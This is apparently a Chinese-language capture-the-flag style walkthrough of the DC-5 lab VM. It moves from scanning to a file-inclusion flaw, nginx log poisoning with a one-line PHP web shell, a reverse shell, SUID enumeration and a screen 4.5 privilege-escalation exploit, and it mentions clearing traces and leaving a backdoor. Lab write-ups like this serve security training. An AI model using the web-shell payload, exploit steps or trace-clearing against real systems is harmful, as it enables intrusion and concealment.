DC-5渗透测试
0x00实验环境
靶机:DC-5,IP地址:192.168.8.138
测试机:Kali,IP地址:192.168.8.140;
0x01实验流程
信息收集——主机发现、端口扫描
渗透测试
0x02实验步骤
- 主机发现
- 端口及服务扫描
- 访问web
扫描web目录
然而没有什么有价值信息
继续浏览得到
但是我们发现这里contact页面的年份信息会随着刷新页面而变化
访问http://192.168.8.138/footer.php
考虑存在文件包含
- BP抓包,尝试文件包含
发现的确存在文件包含
尝试远程文件包含,结果不行
尝试写入phpinfo,由于web站点为nginx,查找得知nginx日志位置为/var/log/nginx/access.log
查找日志位置是由于,不管何种访问,日志都会将具体访问数据记录下来并保存在日志文件中,所以可以考虑写入一句话木马,然后菜刀或者蚁剑连接
写入<?php system($_GET['cmd']); ?>
查看日志
尝试蚁剑连接
连接成功
- 在蚁剑虚拟终端中设置反向shell并在kali监听
利用python切换shell
素质三联
使用find命令,查找具有root权限的命令
find / -perm -u=s -type f 2>/dev/null
- 查找screen 4.5漏洞并利用
单独保存libhax.c以及rootshell.c并编译
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
将41154.sh中剩下部分代码另存为dc5.sh脚本文件
并在保存dc5.sh文件输入 :set ff=unix ,否则在执行脚本文件时后出错
将libhax.so 、rootshell 、dc5.sh三个文件上传到靶机的/tmp目录下
赋予dc5.sh执行权限并运行
提权成功
- 清理痕迹,留下后门
总结:
- 探测网页,发现疑似文件包含点,尝试证实文件包含
- 尝试远程文件包含,错误,由于中间件为nginx,尝试输入一句话木马被日志记录
- 蚁剑连接,并设置反弹shell被kali连接
- 搜索当前用户可用的root权限命令,并查找奇对于版本漏洞
- 利用对应版本漏洞脚本,下载到目标主机上并提权